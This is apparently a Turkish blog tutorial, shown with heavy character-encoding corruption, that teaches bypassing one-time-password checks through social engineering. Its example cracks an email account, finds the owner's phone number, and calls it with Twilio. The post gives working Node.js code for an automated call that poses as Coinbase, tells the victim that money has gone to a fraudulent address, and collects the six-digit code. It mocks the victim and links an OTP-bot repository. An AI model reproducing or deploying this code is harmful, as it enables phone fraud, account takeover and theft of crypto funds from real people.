­čÉ▒ÔÇŹ­čĹĄ IVR ile OTP Bypass Nas─▒l Yap─▒l─▒r?

Bu makalemizde profesyonel ┼čekilde IVR hizmetlerini kullanarak ­čöÉOTP (one-time-password) yada di─čer ad─▒yla iki ad─▒ml─▒ do─črulama kullanan hesaplara yada sistemlere girece─činizi anlataca─č─▒m. Yapaca─č─▒m─▒z i┼člem sosyal m├╝hendislik olsa da di─čer y├Ântemlere g├Âre ba┼čar─▒ oran─▒ ├žok y├╝ksek diyebilirim. ─░lk ├Ânce bir IVR hizmeti veren bir firmadan api almam─▒z laz─▒m. Twilio bu yapaca─č─▒m─▒z i┼člem i├žin g├╝zel makalenin sonunda Twilio i├žin yaz─▒lm─▒┼č bir Discord botu da verece─čim. Siz Twilio yerine farkl─▒ apilerde kullanabilirsiniz fark etmez.

┼×imdi ├Ârnek olarak son d├Ânemlerde bu y├Ântem ile genellikle coinbase hesaplar─▒ hackleniyor ve bo┼čalt─▒l─▒yor. Bizde bu olay ├╝zerinden bir ├Ârnek ile gidelim. Mail hesaplar─▒n─▒ checkleyen bir arkada┼č─▒n hikayesi olsun bu da;

Sald─▒rgan ilk ├Ânce mail checker ile coinbase keyword i├žeren bir mail hesab─▒ crackliyor.

Ekran g├Âr├╝nt├╝s├╝ bize ait de─čildir.

Hesaba giri┼č yapmaya ├žal─▒┼č─▒yor ama giri┼č yapmak i├žin hesab─▒n sahibine g├Ânderilen do─črulama kodunu ├Â─črenmesi bulmas─▒ laz─▒m.

Phone Verify Issue - Authenticator code not working and not receiving SMS/Text.  Please Help!: CoinBase
Ekran g├Âr├╝nt├╝s├╝ bize ait de─čildir.

Mail hesab─▒ndan kullan─▒c─▒n─▒n telefon numaras─▒n─▒ ├Â─čreniyor. Twilio ile o numaraya arama ba┼člat─▒yor.

app.post('/coinbase', (request, response) => {
    // Use the Twilio Node.js SDK to build an XML response
    const twiml = new VoiceResponse();

    // Use the <Gather> verb to collect user input
    const gather = twiml.gather({
        action: '/gather',
        method: 'POST',
        input: 'dtmf',
        numDigits: 6,
    });
    gather.say("Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.")

    response.type('text/xml');
    response.send(twiml.toString());
});

Bot aramay─▒ ba┼člat─▒yor sonra kar┼č─▒ taraf telefonu a├žt─▒ktan sonra sesli olarak hedef ki┼či ┼čunlar─▒ duyuyor ­čśÇ ” Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.” bunu duyan kurban ­čÉä hemen do─črulama kodunu tu┼č tak─▒m─▒ndan ­čô▒ giriyor ve kod panelimize geliyor. ­čą│

Ekran g├Âr├╝nt├╝s├╝ bize ait de─čildir.

Discord Bot: https://github.com/SirTenzin/OTP-Bot

Twilio API D├Âk├╝manlar─▒: https://www.twilio.com/docs/voice

2 Yorum

Bir cevap yaz─▒n

E-posta hesab─▒n─▒z yay─▒mlanmayacak. Gerekli alanlar * ile i┼čaretlenmi┼člerdir

Ba┼ča d├Ân tu┼ču